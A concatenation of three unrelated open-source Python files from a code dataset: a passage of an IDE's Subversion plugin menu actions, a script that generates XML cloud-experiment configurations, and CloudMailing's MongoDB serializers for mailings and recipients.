'subversion_new')
self.vcsNewAct.setStatusTip(self.tr(
'Create a new project from the VCS repository'
))
self.vcsNewAct.setWhatsThis(self.tr(
"""<b>New from repository</b>"""
"""<p>This creates a new local project from the VCS"""
""" repository.</p>"""
))
self.vcsNewAct.triggered.connect(self._vcsCheckout)
self.actions.append(self.vcsNewAct)
self.vcsUpdateAct = E5Action(
self.tr('Update from repository'),
UI.PixmapCache.getIcon("vcsUpdate.png"),
self.tr('&Update from repository'), 0, 0, self,
'subversion_update')
self.vcsUpdateAct.setStatusTip(self.tr(
'Update the local project from the VCS repository'
))
self.vcsUpdateAct.setWhatsThis(self.tr(
"""<b>Update from repository</b>"""
"""<p>This updates the local project from the VCS"""
""" repository.</p>"""
))
self.vcsUpdateAct.triggered.connect(self._vcsUpdate)
self.actions.append(self.vcsUpdateAct)
self.vcsCommitAct = E5Action(
self.tr('Commit changes to repository'),
UI.PixmapCache.getIcon("vcsCommit.png"),
self.tr('&Commit changes to repository...'), 0, 0, self,
'subversion_commit')
self.vcsCommitAct.setStatusTip(self.tr(
'Commit changes to the local project to the VCS repository'
))
self.vcsCommitAct.setWhatsThis(self.tr(
"""<b>Commit changes to repository</b>"""
"""<p>This commits changes to the local project to the VCS"""
""" repository.</p>"""
))
self.vcsCommitAct.triggered.connect(self._vcsCommit)
self.actions.append(self.vcsCommitAct)
self.vcsLogAct = E5Action(
self.tr('Show log'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show &log'),
0, 0, self, 'subversion_log')
self.vcsLogAct.setStatusTip(self.tr(
'Show the log of the local project'
))
self.vcsLogAct.setWhatsThis(self.tr(
"""<b>Show log</b>"""
"""<p>This shows the log of the local project.</p>"""
))
self.vcsLogAct.triggered.connect(self._vcsLog)
self.actions.append(self.vcsLogAct)
self.svnLogBrowserAct = E5Action(
self.tr('Show log browser'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show log browser'),
0, 0, self, 'subversion_log_browser')
self.svnLogBrowserAct.setStatusTip(self.tr(
'Show a dialog to browse the log of the local project'
))
self.svnLogBrowserAct.setWhatsThis(self.tr(
"""<b>Show log browser</b>"""
"""<p>This shows a dialog to browse the log of the local"""
""" project. A limited number of entries is shown first. More"""
""" can be retrieved later on.</p>"""
))
self.svnLogBrowserAct.triggered.connect(self._vcsLogBrowser)
self.actions.append(self.svnLogBrowserAct)
self.vcsDiffAct = E5Action(
self.tr('Show differences'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show &difference'),
0, 0, self, 'subversion_diff')
self.vcsDiffAct.setStatusTip(self.tr(
'Show the difference of the local project to the repository'
))
self.vcsDiffAct.setWhatsThis(self.tr(
"""<b>Show differences</b>"""
"""<p>This shows differences of the local project to the"""
""" repository.</p>"""
))
self.vcsDiffAct.triggered.connect(self._vcsDiff)
self.actions.append(self.vcsDiffAct)
self.svnExtDiffAct = E5Action(
self.tr('Show differences (extended)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (extended)'),
0, 0, self, 'subversion_extendeddiff')
self.svnExtDiffAct.setStatusTip(self.tr(
'Show the difference of revisions of the project to the repository'
))
self.svnExtDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (extended)</b>"""
"""<p>This shows differences of selectable revisions of"""
""" the project.</p>"""
))
self.svnExtDiffAct.triggered.connect(self.__svnExtendedDiff)
self.actions.append(self.svnExtDiffAct)
self.svnUrlDiffAct = E5Action(
self.tr('Show differences (URLs)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (URLs)'),
0, 0, self, 'subversion_urldiff')
self.svnUrlDiffAct.setStatusTip(self.tr(
'Show the difference of the project between two repository URLs'
))
self.svnUrlDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (URLs)</b>"""
"""<p>This shows differences of the project between"""
""" two repository URLs.</p>"""
))
self.svnUrlDiffAct.triggered.connect(self.__svnUrlDiff)
self.actions.append(self.svnUrlDiffAct)
self.vcsStatusAct = E5Action(
self.tr('Show status'),
UI.PixmapCache.getIcon("vcsStatus.png"),
self.tr('Show &status'),
0, 0, self, 'subversion_status')
self.vcsStatusAct.setStatusTip(self.tr(
'Show the status of the local project'
))
self.vcsStatusAct.setWhatsThis(self.tr(
"""<b>Show status</b>"""
"""<p>This shows the status of the local project.</p>"""
))
self.vcsStatusAct.triggered.connect(self._vcsStatus)
self.actions.append(self.vcsStatusAct)
self.svnChangeListsAct = E5Action(
self.tr('Show change lists'),
UI.PixmapCache.getIcon("vcsChangeLists.png"),
self.tr('Show change lists'),
0, 0, self, 'subversion_changelists')
self.svnChangeListsAct.setStatusTip(self.tr(
'Show the change lists and associated files of the local project'
))
self.svnChangeListsAct.setWhatsThis(self.tr(
"""<b>Show change lists</b>"""
"""<p>This shows the change lists and associated files of the"""
""" local project.</p>"""
))
self.svnChangeListsAct.triggered.connect(self.__svnChangeLists)
self.actions.append(self.svnChangeListsAct)
self.svnRepoInfoAct = E5Action(
self.tr('Show repository info'),
UI.PixmapCache.getIcon("vcsRepo.png"),
self.tr('Show repository info'),
0, 0, self, 'subversion_repoinfo')
self.svnRepoInfoAct.setStatusTip(self.tr(
'Show some repository related information for the local project'
))
self.svnRepoInfoAct.setWhatsThis(self.tr(
"""<b>Show repository info</b>"""
"""<p>This shows some repository related information for"""
""" the local project.</p>"""
))
self.svnRepoInfoAct.triggered.connect(self.__svnInfo)
self.actions.append(self.svnRepoInfoAct)
self.vcsTagAct = E5Action(
self.tr('Tag in repository'),
UI.PixmapCache.getIcon("vcsTag.png"),
self.tr('&Tag in repository...'),
0, 0, self, 'subversion_tag')
self.vcsTagAct.setStatusTip(self.tr(
'Tag the local project in the repository'
))
self.vcsTagAct.setWhatsThis(self.tr(
"""<b>Tag in repository</b>"""
"""<p>This tags the local project in the repository.</p>"""
))
self.vcsTagAct.triggered.connect(self._vcsTag)
self.actions.append(self.vcsTagAct)
self.vcsExportAct = E5Action(
self.tr('Export from repository'),
UI.PixmapCache.getIcon("vcsExport.png"),
self.tr('&Export from repository...'),
0, 0, self, 'subversion_export')
self.vcsExportAct.setStatusTip(self.tr(
'Export a project from the repository'
))
self.vcsExportAct.setWhatsThis(self.tr(
"""<b>Export from repository</b>"""
"""<p>This exports a project from the repository.</p>"""
))
self.vcsExportAct.triggered.connect(self._vcsExport)
self.actions.append(self.vcsExportAct)
self.vcsPropsAct = E5Action(
self.tr('Command options'),
self.tr('Command &options...'), 0, 0, self,
'subversion_options')
self.vcsPropsAct.setStatusTip(self.tr(
'Show the VCS command options'))
self.vcsPropsAct.setWhatsThis(self.tr(
"""<b>Command options...</b>"""
"""<p>This shows a dialog to edit the VCS command options.</p>"""
))
self.vcsPropsAct.triggered.connect(self._vcsCommandOptions)
self.actions.append(self.vcsPropsAct)
self.vcsRevertAct = E5Action(
self.tr('Revert changes'),
UI.PixmapCache.getIcon("vcsRevert.png"),
self.tr('Re&vert changes'),
0, 0, self, 'subversion_revert')
self.vcsRevertAct.setStatusTip(self.tr(
'Revert all changes made to the local project'
))
self.vcsRevertAct.setWhatsThis(self.tr(
"""<b>Revert changes</b>"""
"""<p>This reverts all changes made to the local project.</p>"""
))
self.vcsRevertAct.triggered.connect(self._vcsRevert)
self.actions.append(self.vcsRevertAct)
self.vcsMergeAct = E5Action(
self.tr('Merge'),
UI.PixmapCache.getIcon("vcsMerge.png"),
self.tr('Mer&ge changes...'),
0, 0, self, 'subversion_merge')
self.vcsMergeAct.setStatusTip(self.tr(
'Merge changes of a tag/revision into the local project'
))
self.vcsMergeAct.setWhatsThis(self.tr(
"""<b>Merge</b>"""
"""<p>This merges changes of a tag/revision into the local"""
""" project.</p>"""
))
self.vcsMergeAct.triggered.connect(self._vcsMerge)
self.actions.append(self.vcsMergeAct)
self.vcsSwitchAct = E5Action(
self.tr('Switch'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('S&witch...'),
0, 0, self, 'subversion_switch')
self.vcsSwitchAct.setStatusTip(self.tr(
'Switch the local copy to another tag/branch'
))
self.vcsSwitchAct.setWhatsThis(self.tr(
"""<b>Switch</b>"""
"""<p>This switches the local copy to another tag/branch.</p>"""
))
self.vcsSwitchAct.triggered.connect(self._vcsSwitch)
self.actions.append(self.vcsSwitchAct)
self.vcsResolveAct = E5Action(
self.tr('Conflicts resolved'),
self.tr('Con&flicts resolved'),
0, 0, self, 'subversion_resolve')
self.vcsResolveAct.setStatusTip(self.tr(
'Mark all conflicts of the local project as resolved'
))
self.vcsResolveAct.setWhatsThis(self.tr(
"""<b>Conflicts resolved</b>"""
"""<p>This marks all conflicts of the local project as"""
""" resolved.</p>"""
))
self.vcsResolveAct.triggered.connect(self.__svnResolve)
self.actions.append(self.vcsResolveAct)
self.vcsCleanupAct = E5Action(
self.tr('Cleanup'),
self.tr('Cleanu&p'),
0, 0, self, 'subversion_cleanup')
self.vcsCleanupAct.setStatusTip(self.tr(
'Cleanup the local project'
))
self.vcsCleanupAct.setWhatsThis(self.tr(
"""<b>Cleanup</b>"""
"""<p>This performs a cleanup of the local project.</p>"""
))
self.vcsCleanupAct.triggered.connect(self._vcsCleanup)
self.actions.append(self.vcsCleanupAct)
self.vcsCommandAct = E5Action(
self.tr('Execute command'),
self.tr('E&xecute command...'),
0, 0, self, 'subversion_command')
self.vcsCommandAct.setStatusTip(self.tr(
'Execute an arbitrary VCS command'
))
self.vcsCommandAct.setWhatsThis(self.tr(
"""<b>Execute command</b>"""
"""<p>This opens a dialog to enter an arbitrary VCS command.</p>"""
))
self.vcsCommandAct.triggered.connect(self._vcsCommand)
self.actions.append(self.vcsCommandAct)
self.svnTagListAct = E5Action(
self.tr('List tags'),
self.tr('List tags...'),
0, 0, self, 'subversion_list_tags')
self.svnTagListAct.setStatusTip(self.tr(
'List tags of the project'
))
self.svnTagListAct.setWhatsThis(self.tr(
"""<b>List tags</b>"""
"""<p>This lists the tags of the project.</p>"""
))
self.svnTagListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnTagListAct)
self.svnBranchListAct = E5Action(
self.tr('List branches'),
self.tr('List branches...'),
0, 0, self, 'subversion_list_branches')
self.svnBranchListAct.setStatusTip(self.tr(
'List branches of the project'
))
self.svnBranchListAct.setWhatsThis(self.tr(
"""<b>List branches</b>"""
"""<p>This lists the branches of the project.</p>"""
))
self.svnBranchListAct.triggered.connect(self.__svnBranchList)
self.actions.append(self.svnBranchListAct)
self.svnListAct = E5Action(
self.tr('List repository contents'),
self.tr('List repository contents...'),
0, 0, self, 'subversion_contents')
self.svnListAct.setStatusTip(self.tr(
            'List the contents of the repository'
))
self.svnListAct.setWhatsThis(self.tr(
"""<b>List repository contents</b>"""
"""<p>This lists the contents of the repository.</p>"""
))
self.svnListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnListAct)
self.svnPropSetAct = E5Action(
self.tr('Set Property'),
self.tr('Set Property...'),
0, 0, self, 'subversion_property_set')
self.svnPropSetAct.setStatusTip(self.tr(
'Set a property for the project files'
))
self.svnPropSetAct.setWhatsThis(self.tr(
"""<b>Set Property</b>"""
"""<p>This sets a property for the project files.</p>"""
))
self.svnPropSetAct.triggered.connect(self.__svnPropSet)
self.actions.append(self.svnPropSetAct)
self.svnPropListAct = E5Action(
self.tr('List Properties'),
self.tr('List Properties...'),
0, 0, self, 'subversion_property_list')
self.svnPropListAct.setStatusTip(self.tr(
'List properties of the project files'
))
self.svnPropListAct.setWhatsThis(self.tr(
"""<b>List Properties</b>"""
"""<p>This lists the properties of the project files.</p>"""
))
self.svnPropListAct.triggered.connect(self.__svnPropList)
self.actions.append(self.svnPropListAct)
self.svnPropDelAct = E5Action(
self.tr('Delete Property'),
self.tr('Delete Property...'),
0, 0, self, 'subversion_property_delete')
self.svnPropDelAct.setStatusTip(self.tr(
'Delete a property for the project files'
))
self.svnPropDelAct.setWhatsThis(self.tr(
"""<b>Delete Property</b>"""
"""<p>This deletes a property for the project files.</p>"""
))
self.svnPropDelAct.triggered.connect(self.__svnPropDel)
self.actions.append(self.svnPropDelAct)
self.svnRelocateAct = E5Action(
self.tr('Relocate'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('Relocate...'),
0, 0, self, 'subversion_relocate')
self.svnRelocateAct.setStatusTip(self.tr(
'Relocate the working copy to a new repository URL'
))
self.svnRelocateAct.setWhatsThis(self.tr(
"""<b>Relocate</b>"""
"""<p>This relocates the working copy to a new repository"""
""" URL.</p>"""
))
self.svnRelocateAct.triggered.connect(self.__svnRelocate)
self.actions.append(self.svnRelocateAct)
self.svnRepoBrowserAct = E5Action(
self.tr('Repository Browser'),
UI.PixmapCache.getIcon("vcsRepoBrowser.png"),
self.tr('Repository Browser...'),
0, 0, self, 'subversion_repo_browser')
self.svnRepoBrowserAct.setStatusTip(self.tr(
'Show the Repository Browser dialog'
))
self.svnRepoBrowserAct.setWhatsThis(self.tr(
"""<b>Repository Browser</b>"""
"""<p>This shows the Repository Browser dialog.</p>"""
))
self.svnRepoBrowserAct.triggered.connect(self.__svnRepoBrowser)
self.actions.append(self.svnRepoBrowserAct)
self.svnConfigAct = E5Action(
self.tr('Configure'),
self.tr('Configure...'),
0, 0, self, 'subversion_configure')
self.svnConfigAct.setStatusTip(self.tr(
'Show the configuration dialog with the Subversion page selected'
))
self.svnConfigAct.setWhatsThis(self.tr(
"""<b>Configure</b>"""
"""<p>Show the configuration dialog with the Subversion page"""
""" selected.</p>"""
))
self.svnConfigAct.triggered.connect(self.__svnConfigure)
self.actions.append(self.svnConfigAct)
self.svnUpgradeAct = E5Action(
self.tr('Upgrade'),
self.tr('Upgrade...'),
0, 0, self, 'subversion_upgrade')
self.svnUpgradeAct.setStatusTip(self.tr(
'Upgrade the working copy to the current format'
))
self.svnUpgradeAct.setWhatsThis(self.tr(
"""<b>Upgrade</b>"""
"""<p>Upgrades the working copy to the current format.</p>"""
))
self.svnUpgradeAct.triggered.connect(self.__svnUpgrade)
self.actions.append(self.svnUpgradeAct)
def initMenu(self, menu):
"""
Public method to generate the VCS menu.
@param menu reference to the menu to be populated (QMenu)
"""
menu.clear()
act = menu.addAction(
UI.PixmapCache.getIcon(
os.path.join("VcsPlugins", "vcsPySvn", "icons", "pysvn.png")),
self.vcs.vcsName(), self._vcsInfoDisplay)
font = act.font()
font.setBold(True)
act.setFont(font)
menu.addSeparator()
menu.addAction(self.vcsUpdateAct)
menu.addAction(self.vcsCommitAct)
menu.addSeparator()
menu.addAction(self.vcsNewAct)
menu.addAction(self.vcsExportAct)
menu.addSeparator()
menu.addAction(self.vcsTagAct)
if self.vcs.otherData["standardLayout"]:
menu.addAction(self.svnTagListAct)
menu.addAction(self.svnBranchListAct)
else:
menu.addAction(self.svnListAct)
menu.addSeparator()
menu.addAction(self.vcsLogAct)
menu.addAction(self.svnLogBrowserAct)
menu.addSeparator()
menu.addAction(self.vcsStatusAct)
menu.addAction(self.svnChangeListsAct)
menu.addAction(self.svnRepoInfoAct)
menu.addSeparator()
menu.addAction(self.vcsDiffAct)
menu.addAction(self.svnExtDiffAct)
menu.addAction(self.svnUrlDiffAct)
menu.addSeparator()
menu.addAction(self.vcsRevertAct)
menu.addAction(self.vcsMergeAct)
menu.addAction(self.vcsResolveAct)
menu.addSeparator()
menu.addAction(self.vcsSwitchAct)
menu.addAction(self.svnRelocateAct)
menu.addSeparator()
menu.addAction(self.svnPropSetAct)
menu.addAction(self.svnPropListAct)
menu.addAction(self.svnPropDelAct)
menu.addSeparator()
menu.addAction(self.vcsCleanupAct)
menu.addSeparator()
menu.addAction(self.vcsCommandAct)
menu.addAction(self.svnRepoBrowserAct)
menu.addAction(self.svnUpgradeAct)
menu.addSeparator()
menu.addAction(self.vcsPropsAct)
menu.addSeparator()
menu.addAction(self.svnConfigAct)
def __svnResolve(self):
"""
Private slot used to resolve conflicts of the local project.
"""
self.vcs.svnResolve(self.project.ppath)
def __svnPropList(self):
"""
Private slot used to list the properties of the project files.
"""
self.vcs.svnListProps(self.project.ppath, True)
def __svnPropSet(self):
"""
Private slot used to set a property for the project files.
"""
self.vcs.svnSetProp(self.project.ppath, True)
def __svnPropDel(self):
"""
Private slot used to delete a property for the project files.
"""
self.vcs.svnDelProp(self.project.ppath, True)
def __svnTagList(self):
"""
Private slot used to list the tags of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, True)
def __svnBranchList(self):
"""
Private slot used to list the branches of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, False)
def __svnExtendedDiff(self):
"""
Private slot used to perform a svn diff with the selection of
revisions.
"""
self.vcs.svnExtendedDiff(self.project.ppath)
def __svnUrlDiff(self):
"""
Private slot used to perform a svn diff with the selection of
repository URLs.
"""
self.vcs.svnUrlDiff(self.project.ppath)
def __svnInfo(self):
"""
Private slot used to show repository information for the local project.
"""
self.vcs.svnInfo(self.project.ppath, ".")
def __svnRelocate(self):
"""
Private slot used to relocate the working copy to a new repository URL.
"""
self.vcs.svnRelocate(self.project.ppath)
def __svnRepoBrowser(self):
"""
Private slot to open the repository browser.
"""
self.vcs.svnRepoBrowser(projectPath=self.project.ppath)
def __svnConfigure(self):
"""
Private slot to open the configuration dialog.
"""
e5App().getObject("UserInterface")\
.showPreferences("zzz_subversionPage")
def __svnChangeLists(self):
"""
Private slot used to show a list of change lists.
"""
self.vcs.svnShowChangelists(self.project.ppath)
def __svnUpgrade(self):
"""
Private slot used to upgrade the working copy format.
"""
self.vcs.svnUpgrade(self.project.ppath)
| gpl-3.0 | 8,645,574,378,206,538,000 | 37.45679 | 79 | 0.577127 | false |
lpouillo/execo-g5k-tools | engines/simgrid_paasage/xml_gen_execo.py | 1 | 5079 | import xml.etree.cElementTree as ET # that 'c' in "...etree.cElement..."
# means the package is a C implementation; it runs 15-20 times faster
# than the equivalent pure-Python implementation
import xml.dom.minidom as DOM
import shutil
import lxml.etree as le
import re
import itertools
from optparse import OptionParser
def initXML():
root = ET.Element("nTierApplication")
root.set("version", "1")
ami = ET.SubElement(root, "AMI")
field1 = ET.SubElement(ami, "webService")
field1.set("size", "10000000000.0")
field2 = ET.SubElement(ami, "appsService")
field2.set("size", "10000000000.0")
field3 = ET.SubElement(ami, "dbService")
field3.set("size", "10000000000.0")
field4 = ET.SubElement(ami, "webProxy")
field4.set("size", "10000000000.0")
field5 = ET.SubElement(ami, "appsProxy")
field5.set("size", "10000000000.0")
field6 = ET.SubElement(ami, "dbProxy")
field6.set("size", "10000000000.0")
proxy = ET.SubElement(root, "proxy")
field7 = ET.SubElement(proxy, "webProxy")
field7.set("region", "eu_1")
field7.set("instanceType","m1.small")
field8 = ET.SubElement(proxy, "appsProxy")
field8.set("region", "eu_1")
field8.set("instanceType","m1.small")
field9 = ET.SubElement(proxy, "dbProxy")
field9.set("region", "eu_1")
field9.set("instanceType","m1.small")
return root
def createService(parent, name):
tmp = ET.SubElement(parent, name)
return tmp
def createRegion(parent, name):
tmp = ET.SubElement(parent, "region")
tmp.set("name", name )
return tmp
def createInstance(parent, ty, qt):
tmp = ET.SubElement(parent, "instance")
tmp.set("quantity", qt )
tmp.set("type", ty )
return tmp
def generateExp(comb_str, lis, rootSrc):
root=initXML()
servParent=ET.SubElement(root, "services")
servWeb=createService(servParent,"webService")
servApp=createService(servParent,"appsService")
servDb=createService(servParent,"dbService")
i=0
web = rootSrc.find("webService")
if (web == None):
print "webService tag not found!"
exit(1)
for child1 in web.iter("region"):
regionTmp=createRegion(servWeb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servWeb.remove(regionTmp)
if(not servWeb.getchildren()):
print "ERROR: Web service does not has any vm instance associated for first experiment"
exit(2)
app=rootSrc.find("appsService")
if (app==None):
print "ERROR: appsService tag not found!"
exit(1)
for child1 in app.iter("region"):
regionTmp=createRegion(servApp, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servApp.remove(regionTmp)
if(not servApp.getchildren()):
print "ERROR: Apps Service does not has any vm instance associated for first experiment"
exit(2)
db=rootSrc.find("dbService")
if (db==None):
print "ERROR: dbService tag not found!"
exit(1)
for child1 in db.iter("region"):
regionTmp=createRegion(servDb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servDb.remove(regionTmp)
if(not servDb.getchildren()):
print "ERROR: Db service does not has any vm instance associated for first experiment"
exit(2)
xml_string=ET.tostring(root, encoding='utf8', method='xml')
xml = DOM.parseString(xml_string)
pretty_xml_as_string = xml.toprettyxml()
outFile=open("exp_"+comb_str+".xml", "w")
outFile.write(pretty_xml_as_string)
def create_dict(comb_list):
res_dict=dict()
length=len(comb_list)-1
for i in drange(0,length,2):
res_dict[comb_list[i]]=comb_list[i+1]
return res_dict
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
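# Illustrative sketch (not part of the original script): the "--cb" value is
# expected to alternate instance types and quantities separated by "_", e.g.
# "m1.small_2_m1.large_1". The type names here are assumptions and must match
# the "type" attributes declared in conf.xml.
def _example_comb_parsing():
    comb = "m1.small_2_m1.large_1"
    params = create_dict(comb.split("_"))
    # params == {'m1.small': '2', 'm1.large': '1'}
    return params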
if __name__ == "__main__":
tree = ET.parse("conf.xml")
rootSrc = tree.getroot()
usage = "usage: %prog [options] [args] "
parser = OptionParser(usage=usage)
parser.add_option("--cb", dest="comb", help="current combination")
(options, args) = parser.parse_args()
if not (options.comb):
parser.error("You must provide parameters for the experiment !")
param_dict=create_dict(options.comb.split("_"))
generateExp(options.comb, param_dict, rootSrc)
| gpl-3.0 | -9,222,059,549,375,971,000 | 28.52907 | 100 | 0.617051 | false |
ricard33/cloud-mailing | cloud_mailing/master/serializers.py | 1 | 11463 | # Copyright 2015-2019 Cedric RICARD
#
# This file is part of CloudMailing.
#
# CloudMailing is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# CloudMailing is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CloudMailing. If not, see <http://www.gnu.org/licenses/>.
import email
import email.parser
import email.policy
import logging
import re
from datetime import timedelta, datetime
import dateutil.parser
import txmongo.filter
from twisted.internet import defer
from ..common.encoding import force_text
from .api_common import compute_hourly_stats
from ..common.db_common import get_db
from . import models
from ..common import settings
from ..common.rest_api_common import NotFound
__author__ = 'Cedric RICARD'
log = logging.getLogger('api')
class Serializer(object):
"""
Base class to serialize/unserialize objects to/from json or XMLRPC `struct` format
"""
fields = []
model_class = None
id_field = '_id'
def __init__(self, instance=None, data=None, fields_filter=None, many=False):
self._collection = self.model_class and get_db()[self.model_class._get_name()] or None
self._instance = instance
self._data = data
self._fields_filter = fields_filter or []
if fields_filter == 'total':
self._fields_filter = ['.total']
elif fields_filter == 'none':
self._fields_filter = []
elif fields_filter == 'default_with_total':
self._fields_filter = self.fields + ('.total',)
elif fields_filter == 'default' or fields_filter is None:
self._fields_filter = self.fields
# elif not isinstance(fields_filter, (list, tuple)):
# raise ValueError("Bad value for 'fields_filter' (was '%s')" % fields_filter)
else:
self._fields_filter = fields_filter or []
self._many = many
@property
def filtered_fields(self):
return list(set(self.fields) & set(self._fields_filter))
def make_filter(self, args):
_filter = {}
for field, value in list(args.items()):
if isinstance(value, (list, tuple)):
_filter[field] = {'$in': value}
elif isinstance(value, str):
_filter[field] = {'$regex': '.*' + re.escape(value) + '.*'}
else:
_filter[field] = value
return _filter
def make_get_filter(self, object_id):
"""
Compose the filter used to retrieve an object by its id.
Defaults to using `{_id: object_id}`.
You may want to override this if you need to provide different logic.
"""
return {self.id_field: object_id}
@defer.inlineCallbacks
def get(self, id):
try:
obj = yield self._collection.find_one(self.make_get_filter(id), fields=self.filtered_fields)
if obj:
obj['id'] = obj.pop('_id')
if 'subject' not in obj and 'subject' in self.filtered_fields and 'header' in obj:
parser = email.parser.BytesHeaderParser(policy=email.policy.default)
msg = parser.parsebytes(obj['header'])
obj['subject'] = msg.get('Subject')
defer.returnValue(obj)
raise NotFound
except IndexError:
raise NotFound
except defer._DefGen_Return:
raise
except:
log.exception("Error in Serializer.get()")
raise
@staticmethod
def make_tx_sort_filter(sort):
if sort is None:
return None
if isinstance(sort, str):
return txmongo.filter.sort(txmongo.filter.ASCENDING(sort))
def _get_direction(value):
if value > 0:
return txmongo.filter.ASCENDING
return txmongo.filter.DESCENDING
assert(isinstance(sort, (list, tuple)))
if len(sort) == 2 and isinstance(sort[0], str):
            return txmongo.filter.sort(_get_direction(sort[1])(sort[0]))
return txmongo.filter.sort(sort)
@defer.inlineCallbacks
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_filter = self.make_filter(spec)
# log.debug("find() filter: %s", _filter)
results = yield self._collection.find(_filter, fields=self.filtered_fields, skip=skip, limit=limit,
filter=self.make_tx_sort_filter(sort))
items = []
for obj in results:
if '_id' in obj:
obj['id'] = obj.pop('_id')
items.append(obj)
response = {
'items': items
}
if '.total' in self._fields_filter:
response['total'] = yield self._collection.count(_filter)
defer.returnValue(response)
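# Hypothetical usage sketch (not part of the original module): how a concrete
# serializer defined below might be driven from Twisted code. The status
# values passed in must be members of ``models.relay_status``; the field
# filter name is one of the built-ins handled in ``__init__`` above.
@defer.inlineCallbacks
def _example_list_mailings(status_list):
    serializer = MailingSerializer(fields_filter='default_with_total')
    page = yield serializer.find({'status': status_list}, skip=0, limit=20)
    defer.returnValue((page['items'], page.get('total')))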
class UserSerializer(Serializer):
model_class = models.User
fields = (
'_id', 'username', 'is_superuser', 'groups'
)
class MailingSerializer(Serializer):
"""
Mailing serializer
"""
model_class = models.Mailing
fields = (
'_id', 'domain_name', 'satellite_group', 'owner_guid',
'mail_from', 'sender_name', 'subject', 'status',
'type', 'tracking_url', 'dkim',
'header',
'dont_close_if_empty',
'submit_time', 'scheduled_start', 'scheduled_end', 'scheduled_duration',
'start_time', 'end_time',
'total_recipient', 'total_sent', 'total_pending', 'total_error',
'total_softbounce',
'read_tracking', 'click_tracking', 'mailing', 'url_encoding',
)
def make_filter(self, args):
mailings_filter = {}
if args:
available_filters = ('domain', 'id', 'status', 'owner_guid', 'satellite_group')
for key in list(args.keys()):
if key not in available_filters:
log.error("Bad filter name '%s'. Available filters are: %s", key, ', '.join(available_filters))
raise ValueError("Bad filter name '%s'. Available filters are: %s" % (key, ', '.join(available_filters)))
if 'domain' in args:
domain = args['domain']
if isinstance(domain, str):
mailings_filter['domain_name'] = domain
else:
mailings_filter['domain_name'] = {'$in': domain}
if 'id' in args:
value = args['id']
ids_list = isinstance(value, (list, tuple)) and value or [value]
mailings_filter['_id'] = {'$in': ids_list}
if 'status' in args:
value = args['status']
status_list = isinstance(value, (list, tuple)) and value or [value]
for status in status_list:
available_status = models.relay_status
status = force_text(status)
if status not in available_status:
log.error("Bad status '%s'. Available status are: %s",
status, ', '.join(available_status))
raise ValueError("Bad status '%s'. Available status are: %s"
% (status, ', '.join(available_status)))
mailings_filter['status'] = {'$in': list(map(force_text, status_list))}
if 'owner_guid' in args:
owners = args['owner_guid']
if isinstance(owners, str):
mailings_filter['owner_guid'] = owners
else:
mailings_filter['owner_guid'] = {'$in': owners}
if 'satellite_group' in args:
satellite_groups = args['satellite_group']
if isinstance(satellite_groups, str):
mailings_filter['satellite_group'] = satellite_groups
else:
mailings_filter['satellite_group'] = {'$in': satellite_groups}
return mailings_filter
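# Hypothetical sketch (not part of the original module) of what make_filter()
# produces for a typical query; the domain is made up and the status value
# must belong to ``models.relay_status`` for the call to succeed.
def _example_mailing_filter(serializer, status):
    return serializer.make_filter({'domain': ['example.com'], 'status': [status]})
    # e.g. -> {'domain_name': {'$in': ['example.com']},
    #          'status': {'$in': [status]}}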
class RecipientSerializer(Serializer):
"""
Recipient serializer
"""
model_class = models.MailingRecipient
fields = (
'_id', 'email', 'send_status', 'tracking_id',
'reply_code', 'reply_enhanced_code', 'reply_text', 'smtp_log',
'modified',
'first_try', 'next_try', 'try_count',
'in_progress',
'cloud_client',
)
id_field = 'tracking_id'
@property
def filtered_fields(self):
return list(set(self.fields) & (set(self._fields_filter) | {'tracking_id'}))
@defer.inlineCallbacks
def get(self, id):
recipient = yield super(RecipientSerializer, self).get(force_text(id))
recipient.pop('id')
recipient['id'] = recipient.pop('tracking_id')
defer.returnValue(recipient)
def make_filter(self, args):
_args = args.copy()
if 'mailing' in _args:
_args['mailing.$id'] = _args.pop('mailing')
smtp_reply = _args.pop('smtp_reply', None)
_args = super(RecipientSerializer, self).make_filter(_args)
if smtp_reply:
_args.setdefault('$and', []).append({'$or': [
{'reply_code': smtp_reply},
super(RecipientSerializer, self).make_filter({'reply_text': smtp_reply}),
]})
return _args
class SatelliteSerializer(Serializer):
model_class = models.CloudClient
fields = (
'_id', 'serial', 'enabled', 'paired', 'date_paired', 'shared_key', 'domain_affinity', 'group', 'version',
'settings'
)
class HourlyStatsSerializer(Serializer):
model_class = models.MailingHourlyStats
fields = (
'sender', 'date', 'epoch_hour', 'sent', 'failed', 'tries'
)
# def make_filter(self, args):
# _args = args.copy()
# from_date = dateutil.parser.parse(_args.pop('from_date', None))
# to_date = _args.pop('to_date', None)
# _args.setdefault('date', {})['$gte'] = from_date
# if not to_date:
# to_date = from_date + timedelta(hours=999)
# else:
# to_date = dateutil.parser.parse(to_date)
